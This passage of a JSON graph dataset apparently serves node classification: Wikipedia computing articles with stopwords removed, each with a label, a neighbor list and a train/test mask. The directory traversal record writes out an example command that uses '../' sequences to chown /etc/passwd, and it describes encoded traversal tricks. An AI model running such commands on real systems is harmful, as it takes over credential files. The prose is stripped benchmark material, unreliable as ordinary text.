halting problem turing-undecidable problem infinite tape data called turing oracle even turing oracle random data computable probability 1 since countably many computations uncountably many oracles computer random turing oracle compute things turing machine known laws physics consequences computable series approximations digital computer hypothesis called digital physics states accident universe computable universal turing machine would imply computer powerful universal turing machine built physically computational systems algebras calculi discussed turing complete systems intended studying theoretical computer science intended simple possible would easier understand limits computation programming languages conventional unconventional turing-complete includes rewrite systems turing-complete turing completeness abstract statement ability rather prescription specific language features used implement ability features used achieve turing completeness quite different fortran systems would use loop constructs possibly even goto statements achieve repetition haskell prolog lacking looping almost entirely would use recursion programming languages describing computations von neumann architectures memory ram register control unit two elements make architecture turing-complete even pure functional languages turing-complete turing completeness declarative sql implemented recursive common table expressions unsurprisingly procedural extensions sql plsql etc also turing complete illustrates one reason relatively powerful non-turing-complete languages rare powerful language initially complex tasks applied sooner lack completeness becomes perceived drawback encouraging extension turing complete untyped lambda calculus turing-complete many typed lambda calculi including system f value typed systems based ability represent typical computer programs detecting errors rule 110 conway game life cellular automata turing complete games software turing-complete accident video games card games zero-person games simulations computer hardware many computational languages exist turing complete one example set regular languages generated regular expressions recognized finite automata powerful still turing-complete extension finite automata category pushdown automata context-free grammars commonly used generate parse trees initial stage program compiling examples include early versions pixel shader languages embedded direct3d opengl extensions total functional programming languages charity epigram functions total must terminate charity uses type system control constructs based category theory whereas epigram uses dependent types loop language designed computes functions primitive recursive compute proper subsets total computable functions since full set total computable functions computably enumerable also since functions languages total algorithms recursively enumerable sets written languages contrast turing machines although untyped lambda calculus turing-complete simply typed lambda calculus notion turing-completeness apply languages xml html json yaml s-expressions typically used represent structured data describe computation sometimes referred markup languages properly container languages data description languages",
    "neighbors": [
      4481,
      9345,
      5510,
      7558,
      3336,
      12,
      2316,
      2062,
      11154,
      6036,
      10137,
      7069,
      10142,
      1952,
      3876,
      5796,
      428,
      3629,
      5677,
      10413,
      2619,
      8262,
      73,
      5833,
      8524,
      1488,
      6102,
      477,
      8926,
      479,
      11617,
      7395,
      7805,
      6502,
      8421,
      8554,
      7019,
      9714,
      502,
      3960,
      11641,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 10954,
    "label": 3,
    "text": "VESA_Stereo:vesa stereo vesa stereo liquid crystal shutter glasses interface standard video electronics standards association vesa stereoscopic 3d displays system drive glasses directly instead providing basic signal power used electronics either inside glasses external unit vesa stereo connector extensively used 3d accelerators well 3d dlp tvs stereo-sync signal changes system changing showing images right eye left eye signal ttl signal high state indicates left eye exposed special software necessarily needed create stereo-sync signal created vertical synchronization signal fed monitor using rgb component video",
    "neighbors": [
      9057,
      10658,
      7594,
      6575,
      11631,
      533,
      3453,
      7647
    ],
    "mask": "Test"
  },
  {
    "node_id": 10955,
    "label": 7,
    "text": "CloudMinds:cloudminds cloudminds operator cloud-based systems intelligent robots founded early 2015 concentrates building safe cloud computing network intelligent robots creating large mixed platform machine learning safe intelligent terminals robot control units rcus founded 2015 cloudminds created cloud-based intelligent robot architecture based cloud brain secure network backed softbank foxconn walden venture investments keytone ventures cloudminds developed in-depth research cloud intelligence integration high-speed security network safe smart devices robot control technology cloudminds built human augmented robotics intelligence hari platform applied significant areas blind guiding operator created world first cloud-based terminal “ data ” series working constructing backbone network worldwide vbn based nuclear technologies cloudminds succeeded realizing mobile intranet cloud services mcs contains function improving information security cloud robot remote controlling technology widely used areas financial medical military public security department large-scale manufacturing industry cloudminds first cloud robot operator builds platform services make robots connect learn possible tendency household robot 2025 company determines develop ground breaking technology ai robotic control network cloud security mobile intranet cloud services mcs platform offers secure device cloud connection high performance low latency private network besides target partner best minds ai smart devices first products include blind guiding robot ai mobile device used control unit generic robots order stimulate end-to-end ecosystem products services used solve complex problems health care manufacturing finance industries data cloud intelligent device serve controller robot cloud brain implemented hardware virtualization qualcomm platform cloudminds also implemented gpu virtualization data data uses self-developed sandwich-like hardware extension architecture based special hardware interface enables support dual lte meta first wearable device based cloud framework cloudminds takes shape helmet visually impaired people support face recognition object recognition path planning obstacle avoidance etc mobile-intranet cloud service mcs made three parts xaas cloud vbn terminal design terminal contains technologies dual chips virtualization applies artificial intelligence activate robot ai mobile xaas cloud based original hari human augmented robotic intelligence architecture realize integration artificial intelligence human intelligence provide image recognition enterprise collaboration different types services xaas cloud currently completed first phase construction providing cloud service platform mcs since august 2015 cloudminds begun construct backbone network worldwide realize network path optimization protocol optimization provide safe high-speed internet service sdn software defined network sdp software defined boundary",
    "neighbors": [
      5373
    ],
    "mask": "None"
  },
  {
    "node_id": 10956,
    "label": 5,
    "text": "Mailsite:mailsite mailsite commercial mail server calendar software contact manager collaborative software developed rockliffe systems mailsite one first mail servers run windows nt using internet standards version 1.2 released 1996 mailsite continual development since 1996 version 10 released 2013 mailsite runs single windows server cluster windows server computers mailsite works natively microsoft outlook versions 2007 2013 mail calendar contacts without requiring outlook plug-ins mailsite includes exchange activesync eas server synchronizing mail calendar contacts mobile devices mailsite also works internet standards-based mail clients mozilla thunderbird mailsite sold three package configurations different markets mailsite se single-server package small medium enterprises mailsite le multi-server package large enterprises mailsite sp provides advanced multi-server clustering service providers hosting companies internet service providers telecommunication companies mailsite provides comprehensive set features groupware mailsite provides native support mail calendar contact sync clients mail",
    "neighbors": [
      1664,
      9986,
      3465,
      8976,
      9747,
      11030,
      11418,
      2208,
      9642,
      7983,
      1075,
      2101,
      9909,
      3015,
      6231,
      7255,
      9451,
      10861,
      10866,
      5875,
      9459,
      2679,
      3578,
      8443,
      7036
    ],
    "mask": "None"
  },
  {
    "node_id": 10957,
    "label": 2,
    "text": "Criticism_of_Windows_10:criticism windows 10 windows 10 operating system released microsoft july 2015 criticized reviewers users due issues mostly privacy subject number negative assessments various groups critics noted windows10 heavily emphasizes freemium services contains various advertising facilities outlets considered hidden cost free upgrade offer examples include media storefronts office 365 paid functionality bundled games microsoft solitaire collection default settings display promotions suggested apps start menu tips lock screen may contain advertising ads displayed file explorer office 365 subscriptions redstone 2 builds notifications promoting microsoft edge web browser different browser set default windows 10 home permanently set download updates automatically including cumulative updates security patches drivers users individually select updates install microsoft offers diagnostic tool used hide updates prevent reinstalled already installed uninstalled without rebooting system tom warren verge felt given web browsers google chrome already adopted automatic update system requirement would help keep windows10 devices secure felt 're used family members calling technical support 've failed upgrade latest windows service pack malware disabled windows update days hopefully concerns raised due changes users would unable skip automatic installation updates faulty cause issues certain system configurationsalthough build upgrades also subject public beta testing via windows insider program also concerns forced installation driver updates windows update previously designated optional could cause conflicts drivers installed independently windows update situation occurred prior general release operating system nvidia graphics card driver automatically pushed windows10 users via windows update caused issues prevented use certain functions prevented system booting criticism also directed towards microsoft decision longer provide specific details contents cumulative updates windows 10 february 9 2016 microsoft reversed decision began provide release notes cumulative updates windows website users reported installation november upgrade applications particularly utility programs cpu-z speccy automatically uninstalled upgrade process default programs reset microsoft-specified defaults photos app microsoft edge pdf viewing without warning issues discovered upon launch anniversary update redstone including bug caused devices freeze addressed cumulative update kb3176938 released august 31 2016 fundamental changes windows handles webcams caused many stop working microsoft criticized tactics used promote free upgrade campaign windows 10 including adware-like behaviors using deceptive user interfaces coax users installing operating system downloading installation files without user consent making difficult users suppress advertising notifications wish upgrade 10 upgrade offer marketed initiated using get windows 10 gwx application first downloaded installed via windows update march 2015 registry keys group policy settings could used partially disable gwx mechanism installation patches gwx software via windows update could reset keys back defaults thus reactivate software third-party programs also created assist users applying measures disable gwx september 2015 reported microsoft triggering automatic downloads windows10 installation files compatible windows7 8.1computers configured automatically download install updates regardless whether specifically requested upgrade microsoft officially confirmed change claiming industry practice reduces time installation ensures device readiness move criticized users data caps devices low storage capacity resources consumed automatic downloads 6gb data critics argued microsoft triggered downloading windows10 installation files without user consent october 2015 windows10 began appear optional update windows update interface pre-selected installation systems microsoft spokesperson said mistake download would longer pre-selected default however october 29 2015 microsoft announced planned classify windows10 recommended update windows update interface time 2016 cause automatic download installation files one-time prompt choice install appear december 2015 reported new advertising dialog begun appear containing upgrade upgrade tonight buttons obvious method decline installation besides close button march 2016 users also alleged windows 7 8.1 devices automatically begun upgrading 10 without consent june 2016 gwx dialog behavior changed make closing window imply consent scheduled upgrade despite infoworld editor disputed claims upgrades begun without consent testing showed upgrade windows10 would begin user accepts end-user license agreement eula presented installer would eventually cause windows update time error thus halting installation attempt concluded users may unknowingly clicked accept prompt without full knowledge would begin upgrade december 2016 microsoft chief marketing officer chris capossela admitted company gone far using tactic stating know want people running windows 10 security perspective finding right balance ’ stepping line aggressive something tried lot year think got right january 21 2016 microsoft sued small claims court user whose computer shortly release os attempted upgrade windows10 without consent upgrade failed computer left unstable state thereafter disrupted ability run travel agency court ruled favor user awarded 10,000 damages microsoft appealed however may 2016 microsoft dropped appeal chose pay damages shortly suit reported seattle times microsoft confirmed updating gwx software add explicit options opting free windows 10 upgrade final notification full-screen pop-up window notifying users impending end free upgrade offer contained remind later notify notify three times options concerns shown advocates critics windows10 privacy policies collection use customer data default express settings windows 10 configured send various information microsoft parties including collection user contacts calendar data computer appearance including color chassis associated input data personalize speech typing inking input typing inking data improve recognition allow apps use unique advertising id analytics advertising personalization functionality introduced windows 8.1 allow apps request user location data send data microsoft trusted partners improve location detection windows 8 similar settings except location data collection include trusted partners users opt data collection telemetry data error reporting usage also sent microsoft disabled non-enterprise versions windows 10 use cortana intelligent personal assistant also requires collection data device location data calendar apps use data emails text messages call contacts often interact device ” personalize functionality rock paper shotgun writer alec meer argued microsoft intent data collection lacked transparency stating world 45 pages policy documents opt-out settings split across 13 different settings screens external website constitutes 'real transparency extremetech pointed whilst previously campaigning google similar data collection strategies microsoft hoovers data ways would make google jealous however also pointed requirement vast usage customer data become norm citing increased reliance cloud computing forms external processing well similar data collection requirements services mobile devices google siri august 2015 russian politician nikolai levichev called windows 10 banned use russian government sends user data servers united states federal law requiring online services store data russian users servers within country blocked took effect september 2016 writing zdnet ed bott said lack complaints businesses privacy windows10 indicated utterly normal privacy terms 2015 computerworld editorial preston gralla said kind information windows10 gathers different operating systems gather microsoft held different standard companies microsoft services agreement reads company online services may automatically download software updates configuration changes including prevent accessing services playing counterfeit games using unauthorized hardware peripheral devices critics interpreted statement implying microsoft would scan delete unlicensed software installed devices running windows10 however others pointed agreement specifically microsoft online services microsoft account office 365 skype well xbox live offending passage likely referred digital rights management xbox consoles first-party games plans police pirated video games installed windows10 pcs despite torrent trackers announced plans block windows10 users also arguing operating system could send information anti-piracy groups affiliated microsoft writing allegations ed bott zdnet compared microsoft privacy policy apple google concluded carefully reading microsoft services agreement windows license agreement ... microsoft privacy statement carefully n't see anything looks remotely like big brother columnist kim komando argued microsoft might future run scans disable software hardware sees security threat consistent windows10 update policy following release 10 allegations also surfaced microsoft backported operating system increased data collection windows 7 windows 8 via recommended patches added additional telemetry features updates addition diagnostics tracking service connected specifically microsoft existing customer experience improvement program opt-in program sends additional diagnostic information microsoft addressing issues application insights service third-party software data collection functionality capable transmitting personal information browsing history contents emails chat video calls voice mail photos documents personal files keystrokes microsoft analysis accordance end user license agreement terms services agreement microsoft updated state following october 2017 dutch data protection authority issued complaint asserting windows10 privacy policies comply laws netherlands claims microsoft provide sufficient information information collected full telemetry level processed microsoft disputed claim provide enough disclosure full telemetry level stated working ddpa find appropriate solutions november 2016 kaspersky lab filed antitrust complaint russia regarding bundling windows defender operating system arguing microsoft abusing position favor in-house antivirus software vendors june 2017 kaspersky filed another complaint european commission accusing company frustrating use third-party antivirus software windows 10 defense inferior windows defender including forcibly uninstalling third-party antivirus software upgrades providing enough time antivirus developers certify software new upgrade windows 10 microsoft stated company engages deeply antimalware vendors taken number steps address feedback offered meet kaspersky executives discuss specific concerns june 21 2017 microsoft issued blog post confirming since creators update windows 10 may prompt users temporarily disable virus software upon installation feature update current version deemed compatible operating system would direct users relevant updates software following conclusion update microsoft stated worked vendors perform compatibility testing software update specify versions software compatible direct customers updating microsoft reported result efforts around 95 windows 10 users antivirus application installed already compatible windows 10 creators update microsoft clarified windows defender operates device security software installed security software reports subscription lapsed summer 2018 windows 10 insider update received extreme backlash planned feature would attempted prevent installation web browsers chrome firefox telling users already microsoft edge therefore need change browser",
    "neighbors": [
      6150,
      11283,
      3605,
      5666,
      11301,
      6697,
      1581,
      7215,
      5173,
      8757,
      582,
      1098,
      9812,
      8798,
      4704,
      4194,
      10338,
      8296,
      617,
      5225,
      8299,
      7796,
      6265,
      8315,
      636,
      639,
      641,
      7809,
      651,
      6797,
      10896,
      2196,
      10900,
      3224,
      7838,
      2213,
      6827,
      3250,
      9910,
      7359,
      4289,
      194,
      4816,
      3289,
      4316,
      740,
      4326,
      9448,
      10989,
      259,
      4356,
      11524,
      782,
      8976,
      3857,
      11030,
      11546,
      11549,
      7456,
      7970,
      3875,
      11559,
      1832,
      3881,
      6441,
      7983,
      3890,
      11060,
      6462,
      321,
      9033,
      6476,
      11605,
      2391,
      4439,
      11103,
      2919,
      4458,
      877,
      9585,
      1916,
      8576,
      3463,
      1935,
      8080,
      4505,
      929,
      4515,
      3496,
      8627,
      7615,
      7106,
      3527,
      4051,
      9173,
      11221,
      5600,
      8681,
      4074,
      5103
    ],
    "mask": "Test"
  },
  {
    "node_id": 10958,
    "label": 2,
    "text": "Execute_Channel_Program:execute channel program ibm mainframe operating systems execute channel program excp supervisor call low-level device access programmer responsible providing channel program —a list device-specific commands ccws —to executed i/o channels control units devices excp specifically described os system programmer guide using excp legacy devices legacy datasets may operated relatively high performance excp devices opened made available application specifying macrf= e data control block dcb comprehensive list exits called excp context appendages allows authorized programs override augment many system security data integrity checks appendages really closed subroutines supported compatibility earlier instances os functions several modified extended mvs appendages specified dcb last two characters module name igg019xx xx wa z9 inclusive module names reserved installation-written appendages name form igg019xx reserved use ibm access methods appendages must reside sys1.svclib sys1.lpalib svs later instances os normally device opened excp first extent represented data extent block deb among information deb contains information location size extent data set deb forward- backward-chained dcb system security measure dcb resides unprotected user storage whereas deb resides protected system storage subpool 253 example programmer tries read past end extent exception occurs operation suppressed thereby preventing data integrity exposure deb include additional extents channel program may updated programmer refer next extent excp may reissued end extent exit appendage provided may update channel program next extent operation may re-driven without first going excp processor excp sometimes confused direct access storage device access method direct access storage devices exclusively rather general purpose low-level device access interface supports legacy device type legacy dataset organization accessing device types dataset organizations general start input/output interface startio available mvs/370 subsequent instances os although officially supported interface variation excp execute direct access program xdap used accessing direct access storage provided reading updating existing direct access storage records xdap used add records xdap utilized along bsam bpam effect record additions datasets several os components utilize xdap manner linkage editor iewl particular excp may also used access communications devices attached ibm 2701 2702 2703 communications controllers ibm 370x amdahl 470x front-end processors respective follow-ons operating emulator mode ep partitioned emulator mode pep excp front-end always tcb mode excp type 1 svc mvs/370 subsequent instances os excp processor invokes startio schedule execution channel program although excp processor back-end always srb mode back-end contains emulation code allows appendages developed earlier pre-mvs instances os specifically excp function largely thereby appear tcb mode appendages originally designed distinction complicate conversion certain roll-your-own access methods applications mvs",
    "neighbors": [
      11656,
      7312,
      7836,
      6434,
      4645,
      7983,
      10415,
      2616,
      8393,
      8911,
      3669,
      10072,
      8290,
      868,
      7272,
      4586,
      10094,
      6647,
      11131
    ],
    "mask": "Test"
  },
  {
    "node_id": 10959,
    "label": 4,
    "text": "Directory_traversal_attack:directory traversal attack directory traversal path traversal consists exploiting insufficient security validation sanitization user-supplied input file names characters representing traverse parent directory passed file apis goal attack use affected application gain unauthorized access file system attack exploits lack security software acting exactly supposed opposed exploiting bug code directory traversal also known codice_1 dot dot slash attack directory climbing backtracking forms attack also canonicalization attacks typical example vulnerable application php code attack system could send following http request generating server response repeated codice_1 characters codice_3 caused codice_4 traverse root directory include unix password file codice_5 unix codice_5 common file used demonstrate directory traversal often used crackers try cracking passwords however recent unix systems passwd file contain hashed passwords instead located shadow file read unprivileged users machine however still useful account enumeration machine still displays user accounts system listed known directory traversal attack strings common unix-like directory traversal uses codice_1 characters sudo privilege management program ubiquitous unix vulnerable attack users use glob wildcard e.g chown /opt/myapp/myconfig/* could exploited command sudo chown baduser /opt/myapp/myconfig/../../../etc/passwd microsoft windows dos directory traversal uses codice_8 codice_1 character sequences partition separate root directory labeled codice_10 particular partition c common root directory means directory vulnerabilities windows attack limited single partition kind attack cause numerous microsoft vulnerabilities canonicalization problem web applications scan query string dangerous characters prevent directory traversal however query string usually uri decoded use therefore applications vulnerable percent encoded directory traversal canonicalization problem utf-8 noted source vulnerabilities attack vectors bruce schneier jeffrey streifling microsoft added unicode support web server new way encoding codice_1 introduced code causing attempts directory traversal prevention circumvented multiple percent encodings translated codice_25 codice_26 characters percent encodings decoded corresponding 8-bit characters microsoft webserver historically correct behavior windows dos traditionally used canonical 8-bit characters sets based upon ascii however original utf-8 canonical several strings string encodings translatable string microsoft performed anti-traversal checks without utf-8 canonicalization therefore noticing hex codice_27 hex codice_28 character string comparisons malformed percent encodings codice_29 also utilized use archive formats like zip allows directory traversal attacks files archive written overwrite files filesystem backtracking code uncompresses archive files written check paths files archive engage path traversal possible algorithm preventing directory traversal would user use null character indicating end string order bypass everything _get php-specific",
    "neighbors": [
      6497,
      9762,
      1315,
      5636,
      6916,
      8644,
      4956,
      3785,
      1803,
      6797,
      2095,
      8368,
      10579,
      10068,
      5397,
      3708,
      6813
    ],
    "mask": "Train"
  },
  {
    "node_id": 10960,
    "label": 9,
    "text": "ESC/P:esc/p esc/p short epson standard code printers sometimes styled escape/p printer control language developed epson control computer printers mainly used dot matrix printers inkjet printers still widely used many receipt printers era dot matrix printers also used manufacturers e.g. nec sometimes modified form time popular mechanism add formatting printed text widely supported software esc/p derives name start escape sequences used start escape character esc ascii code 27 example esc e switch printing bold font esc f switches bold printing esc/p control codes sometimes also referred epson lq codes made popular epson lq series dot matrix printers even though esc/p introduced long lq printers several variants esc/p printers implement commands 2014 modern printers use esc/p instead driven standardized page description language usually pcl postscript use proprietary protocols esc/page current epson impact printers still support esc/p epson stylus inkjets still seem using variant esc/p see gutenprint gimp print project source code examples",
    "neighbors": [
      10273,
      2786,
      8355,
      3974,
      7847,
      7626,
      6830,
      7696,
      8628,
      8763,
      3579
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10961,
    "label": 4,
    "text": "FreeOTP:freeotp freeotp free open-source software token used two-factor authentication provides implementations hotp totp tokens added scanning qr code manually entering token configuration maintained red hat apache 2.0 license supports android ios",
    "neighbors": [
      9353,
      1553,
      7958,
      2974,
      5677,
      7983,
      10801,
      10172,
      8539,
      5723,
      4961,
      5988,
      5096,
      3309,
      9455,
      4729,
      11643,
      7292,
      3582
    ],
    "mask": "None"
  },
  {
    "node_id": 10962,
    "label": 4,
    "text": "Evaluation_Assurance_Level:evaluation assurance level evaluation assurance level eal1 eal7 product system numerical grade assigned following completion common criteria security evaluation international standard effect since 1999 increasing assurance levels reflect added assurance requirements must met achieve common criteria certification intent higher levels provide higher confidence system principal security features reliably implemented eal level measure security system simply states level system tested achieve particular eal computer system must meet specific assurance requirements requirements involve design documentation design analysis functional testing penetration testing higher eals involve detailed documentation analysis testing lower ones achieving higher eal certification generally costs money takes time achieving lower one eal number assigned certified system indicates system completed requirements level although every product system must fulfill assurance requirements achieve particular level fulfill functional requirements functional features certified product established security target document tailored product evaluation therefore product higher eal necessarily secure particular application one lower eal since may different lists functional features security targets product fitness particular security application depends well features listed product security target fulfill application security requirements security targets two products contain necessary security features higher eal indicate trustworthy product application eal1 applicable confidence correct operation required threats security viewed serious value independent assurance required support contention due care exercised respect protection personal similar information eal1 provides evaluation toe target evaluation made available customer including independent testing specification examination guidance documentation provided intended eal1 evaluation could successfully conducted without assistance developer toe minimal cost evaluation level provide evidence toe functions manner consistent documentation provides useful protection identified threats eal2 requires cooperation developer terms delivery design information test results demand effort part developer consistent good commercial practice require substantially increased investment cost time eal2 therefore applicable circumstances developers users require low moderate level independently assured security absence ready availability complete development record situation may arise securing legacy systems eal3 permits conscientious developer gain maximum assurance positive security engineering design stage without substantial alteration existing sound development practices eal3 applicable circumstances developers users require moderate level independently assured security require thorough investigation toe development without substantial re-engineering eal4 permits developer gain maximum assurance positive security engineering based good commercial development practices though rigorous require substantial specialist knowledge skills resources eal4 highest level likely economically feasible retrofit existing product line eal4 therefore applicable circumstances developers users require moderate high level independently assured security conventional commodity toes prepared incur additional security-specific engineering costs commercial operating systems provide conventional user-based security features typically evaluated eal4 examples operating systems aix hp-ux oracle linux netware solaris suse linux enterprise server 9 suse linux enterprise server 10 red hat enterprise linux 5 windows 2000 service pack 3 windows 2003 windows xp windows vista windows 7 windows server 2008 r2 z/os version 2.1 z/vm version 6.3 operating systems provide multilevel security evaluated minimum eal4 examples include trusted solaris solaris 10 release 11/06 trusted extensions early version xts-400 vmware esxi version 3.0.2 3.5 4.0 aix 4.3 aix 5l aix 6 aix7 red hat 6.2 suse linux enterprise server 11 eal 4+ vsphere 5.5 update 2 achieve eal4+ level eal2+ certified june 30 2015 eal5 permits developer gain maximum assurance security engineering based upon rigorous commercial development practices supported moderate application specialist security engineering techniques toe probably designed developed intent achieving eal5 assurance likely additional costs attributable eal5 requirements relative rigorous development without application specialized techniques large eal5 therefore applicable circumstances developers users require high level independently assured security planned development require rigorous development approach without incurring unreasonable costs attributable specialist security engineering techniques numerous smart card devices evaluated eal5 multilevel secure devices tenix interactive link xts-400 stop 6 general-purpose operating system evaluated eal5 augmented lpar ibm system z eal5 certified eal6 permits developers gain high assurance application security engineering techniques rigorous development environment order produce premium toe protecting high-value assets significant risks eal6 therefore applicable development security toes application high risk situations value protected assets justifies additional costs green hills software integrity-178b rtos certified eal6 augmented eal7 applicable development security toes application extremely high risk situations and/or high value assets justifies higher costs practical application eal7 currently limited toes tightly focused security functionality amenable extensive formal analysis tenix interactive link data diode device fox-it fox data diode one-way data communications device claimed evaluated eal7 augmented eal7+ technically speaking higher eal means nothing less evaluation completed stringent set quality assurance requirements often assumed system achieves higher eal provide security features reliably required third-party analysis testing performed security experts reasonable evidence direction little published evidence support assumption 2006 us government accountability office published report common criteria evaluations summarized range costs schedules reported evaluations performed levels eal2 eal4 mid late 1990s vendors reported spending us 1 million even us 2.5 million evaluations comparable eal4 published reports cost various microsoft windows security evaluations cases evaluation may augmented include assurance requirements beyond minimum required particular eal officially indicated following eal number word augmented usually list codes indicate additional requirements shorthand vendors often simply add plus sign eal4+ indicate augmented requirements common criteria standards denote eals shown article prefix eal concatenated digit 1 7 examples eal1 eal3 eal5 practice countries place space prefix digit eal 1 eal 3 eal 5 use plus sign indicate augmentation informal shorthand used product vendors eal4+ eal 4+",
    "neighbors": [
      6797,
      5136,
      9745,
      7187,
      1304,
      8859,
      2168,
      5280,
      7983,
      11184,
      1458,
      4914,
      8627,
      7733,
      10170,
      6593,
      8904,
      2761,
      202,
      2122,
      6604,
      3671,
      2656,
      5240,
      2558
    ],
    "mask": "None"
  },
  {
    "node_id": 10963,
    "label": 4,
    "text": "Black-bag_cryptanalysis:black-bag cryptanalysis cryptography black-bag cryptanalysis euphemism acquisition cryptographic secrets via burglary covert means – rather mathematical technical cryptanalytic attack term refers black bag equipment burglar would carry black bag operation rubber-hose cryptanalysis technically form cryptanalysis term used sardonically however given free availability high strength cryptographic systems type attack much serious threat users mathematical attacks often much easier attempt circumvent cryptographic systems e.g steal password attack directly regardless technique used methods intended capture highly sensitive information e.g cryptographic keys key-rings passwords unencrypted plaintext required information usually copied without removing destroying capture often takes place without victim realising occurred addition burglary covert means might include installation keystroke logging trojan horse software hardware installed near target computers ancillary devices even possible monitor electromagnetic emissions computer displays keyboards distance 20 metres thereby decode typed could done surveillance technicians via form bug concealed somewhere room although sophisticated technology often used black bag cryptanalysis also simple process copying password someone unwisely written piece paper left inside desk drawer case united states v. scarfo highlighted one instance fbi agents using sneak peek warrant placed keystroke logger alleged criminal gang leader",
    "neighbors": [
      7424,
      7556,
      10756,
      2567,
      3084,
      2957,
      7056,
      658,
      8978,
      660,
      1173,
      1941,
      4128,
      4389,
      10662,
      169,
      11185,
      2357,
      10806,
      1847,
      9528,
      2110,
      9541,
      10315,
      6863,
      8273,
      7635,
      212,
      9556,
      11349,
      2265,
      7643,
      8283,
      9697,
      229,
      618,
      1898,
      881,
      1654,
      7161,
      7034,
      892
    ],
    "mask": "None"
  },
  {
    "node_id": 10964,
    "label": 9,
    "text": "Lego_Mindstorms_NXT:lego mindstorms nxt lego mindstorms nxt programmable robotics kit released lego late july 2006 replaced first-generation lego mindstorms kit called robotics invention system base kit ships two versions retail version set 8527 education base set set 9797 comes nxt-g programming software optionally labview lego mindstorms variety unofficial languages exist nxc nbc lejos nxj robotc second generation set lego mindstorms nxt 2.0 released august 1 2009 featuring color sensor upgraded capabilities third generation ev3 released september 2013 main component kit brick-shaped computer called nxt intelligent brick take input four sensors control three motors via modified version rj12 cables much similar incompatible rj11 phone cords plastic pin hold cable socket moved slightly right brick 100×60 pixel monochrome lcd four buttons used navigate user interface using hierarchical menus 32-bit arm7tdmi-core atmel at91sam7s256 microcontroller 256 kb flash memory 64 kb ram plus 8-bit atmel avr atmega48 microcontroller bluetooth support also speaker play sound files sampling rates 8 khz power supplied 6 aa 1.5 v batteries consumer version kit li-ion rechargeable battery charger educational version intelligent brick remains unchanged nxt 2.0 black version brick made celebrate 10th anniversary mindstorms system change internals lego released firmware nxt intelligent brick open source along schematics hardware components several developer kits available contain documentation nxt simple programs created using menu nxt intelligent brick complicated programs sound files downloaded using usb port wirelessly using bluetooth files also copied two nxt bricks wirelessly mobile phones used remote control three nxt bricks communicate simultaneously via bluetooth user created programs run retail version kit includes software writing programs run windows mac os personal computers software based national instruments labview provides visual programming language writing simple programs downloading nxt brick means rather requiring users write lines code instead use flowchart like blocks design program nxt-g v2.0 graphical programming environment comes bundled nxt careful construction blocks wires encapsulate complexity nxt-g used real-world programming parallel sequence beams actually parallel threads software quite good running handful parallel sense/respond loops example wait 60 seconds play bonk sound low volume battery low loop blending autonomous control bluetooth remote control language supports virtual instruments lego branded 3rd party sensors/components version 2.0 contains new tutorial challenges remote control custom graphics sound designers new lego color sensor support community support significant example http //www.brickshelf.com/cgi-bin/gallery.cgi f=191310 free tools visual studio express combination robotics developer studio enable programming nxt using c language supported languages include ironpython vb.net bricx command center bricxcc integrated development environment ide used write compile edit nbc nxc programs nxt also bricxcc originally made rcx programs written using nqc via bricxcc different firmware versions flashed nxt using bricxcc bricxcc many utilities nextexplorer upload/download files defragment nxt use file hex viewer nextscreen view nxt lcd capture images video next byte codes nbc simple open source language assembly language syntax used program nxt brick bricxcc also capability decompile standard .rxe nxt executables nbc exactly c nxc high level open-source language similar c built nbc compiler also used program nxt brick nxc basically nqc nxt one widely used third-party programming languages nxt nxc even creating video games nxt possible people even got working grayscale nxt screen robolab 2.9 robolab newer programming environment originally used rcx programmable brick version 2.9 updated used program nxt brick lego announced stop officially supporting robolab robolab 2.9 still available still many user forums sources help available robomind educational software specially developed teach students logic programming robotics strength robomind compactness learning environment allows quickly develop test scripts virtual environment scripts directly transferred lego mindstorms nxt robot see result real life robomind script run standard firmware enchanting brings nxt programming popular scratch ide designed lifelong kindergarten group mit make programming intuitive even young children resulting nxt programs compactness clarity offered programming environment robotc programming-language based c vex vex cortex first tech challenge lego mindstorms robotc runs optimized firmware allows nxt run programs quickly also compresses files large number programs fit nxt like nxt languages robotc requires firmware downloaded robotc interface order run nxtgcc gcc toolchain programming nxt firmware c. lejos nxj high level open source language based java uses custom firmware developed lejos team able write c/c++ nxtosek used requires custom firmware write files nxt icon steve hassenplug ideal resource matlab simulink support lego mindstorms programming freely available information found lego mindstorms support matlab simulink pblua port lua programming language general purpose scripting language lego mindstorms port gnat available nxt relies dedicated run-time kernel based ravenscar profile used goce satellite permits use high-level ada features develop concurrent real-time systems mindstorms nxt urbi yet another language parallel event-driven language interfaces c++/java matlab also component architecture uobject distribution urbi compatible many robots including nao cf robocup bioloid aibo fll nxt navigation open source program help navigation fll competition table uses nxt-g .txt files write programs unknown legally implement fll competitions ruby-nxt library program nxt ruby programming language unlike languages nxt code compiled binary file instead code directly transmitted nxt via bluetooth connection robotics.nxt haskell interface nxt bluetooth supports direct commands messages many sensors also unofficial also support simple message-based control nxt brick via remotely executed program basic nxc code included libnxt utility library talking lego mindstorms nxt intelligent brick relatively low level libnxt targeted mainly platforms official lego mindstorms nxt software overlooks namely linux unices work posix-compliant operating system libusb 0.1 http //libusb.sf.net/ supported windows support also possible win32 port libusb c_nxt library controlling lego nxt licensed gplv2 library allows users control lego nxt via bluetooth controller within c programs library provides low level control high level abstraction library runs gnu+linux pynxc project converts python code exactly c nxc code download lego mindstorms robots nxt-python python module communicates nxt via usb bluetooth supports direct commands several aftermarket sensors software ships newer mindstorms ev3 set used program nxt moment bluetooth supported nxt programs must downloaded via usb cable physical etoys visual programming system different electronic devices supports direct mode compiled mode ch c/c++ interpreter running c/c++ code control lego nxt ev3 firmware upload/download required compilation needed c/c++ code running ch control either lego nxt ev3 multiple nxt/ev3 lego mindstorms nxt 1.0 base kit includes parts included lego mindstorms nxt base kit may bought separately sensors come assembled programmed software see programming people decide information comes sensors programming robot move forward touches something lego also sells adapter vernier sensor product line vernier produces data collection devices related software use education sensors connected nxt brick using 6-position modular connector features analog digital interfaces analog interface backward-compatible using adapter older robotics invention system digital interface capable ic rs-485 communication lego mindstorms nxt 2.0 second set lego lego mindstorms series launched august 5 2009 lego shop u.s set contains 619 pieces including new sensor detect colors priced approximately us 280 c 350 £230 500 lego mindstorms nxt 2.0 successor called lego mindstorms ev3 parts ordered separately original kit sensors included color sensor two touch sensors ultrasonic sensor simple programs created using nxt intelligent brick order create larger complex programs programming software pc required standard programming software nxt-g included package third-party programming software also available listed nxt-g programming software included standard base kit based labview graphical programming features interactive drag-and-drop environment nxt-g powered labview industry standard programming created national instruments labview uses data flow programming create virtual instrument allow advanced programming graphical sense national instruments released toolkit nxt version 1.0 came december 2006 since release several bugs found new sensors created 